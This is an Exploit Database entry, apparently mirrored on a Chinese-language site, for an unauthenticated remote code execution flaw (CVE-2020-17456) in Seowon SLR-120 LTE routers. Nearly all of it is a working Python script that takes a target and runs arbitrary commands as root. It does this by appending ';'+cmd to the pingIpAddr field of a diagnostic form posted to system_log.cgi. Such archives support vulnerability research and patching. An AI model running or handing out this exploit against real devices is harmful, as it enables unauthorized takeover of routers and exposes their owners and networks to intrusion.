Seowon SLR-120 Router – Remote Code Execution (Unauthenticated)

• Exploit Database
• 47 阅读

• 作者： Aryan Chehreghani
  日期： 2022-03-11
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50821/

• # Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
  # Date: 2022-03-11
  # Exploit Author: Aryan Chehreghani
  # Vendor Homepage: http://www.seowonintech.co.kr
  # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
  # Version: All version
  # Tested on: Windows 10 Enterprise x64 , Linux
  # CVE : CVE-2020-17456
  
  # [ About - Seowon SLR-120 router ]:
  
  #The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
  #The convenience of sharing wireless internet access invigorates your lifestyle, families,
  #friends and workmates. Carry it around to boost your active communication anywhere.
  
  # [ Description ]:
  
  #Execute commands without authentication as admin user ,
  #To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.
  
  # [ Vulnerable products ]:
  
  #SLR-120S42G
  #SLR-120D42G
  #SLR-120T42G
  
  import requests
  
  print ('''
  ########################################################### 
  #Seowon SLR-120S42G router - RCE (Unauthenticated)#
  #BY:Aryan Chehreghani #
  #Team:TAPESH DIGITAL SECURITY TEAM IRAN #
  # mail:aryanchehreghani@yahoo.com#
  # -+-USE:python script.py #
  # Example Target : http://192.168.1.1:443/#
  ###########################################################
  ''')
  
  url = input ("=> Enter Target : ")
  
  while(True):
  
  try:
  
  cmd = input ("~Enter Command $ ")
  
  header = {
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
  "Accept": "*/*",
  "Accept-Language": "en-US,en;q:0.5",
  "Accept-Encoding": "gzip, deflate",
  "Content-Type": "application/x-www-form-urlencoded",
  "Content-Length": "207",
  "Origin": "http://192.168.1.1",
  "Connection": "close",
  "Referer": "http://192.168.1.1/",
  "Upgrade-Insecure-Requests": "1"
  }
  
  datas = {
  'Command':'Diagnostic',
  'traceMode':'ping',
  'reportIpOnly':'',
  'pingIpAddr':';'+cmd,
  'pingPktSize':'56',
  'pingTimeout':'30',
  'pingCount':'4',
  'maxTTLCnt':'30',
  'queriesCnt':'3',
  'reportIpOnlyCheckbox':'on',
  'logarea':'com.cgi',
  'btnApply':'Apply',
  'T':'1646950471018'
  }
  
  x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)
  
  print(x.text)
  
  except:
  break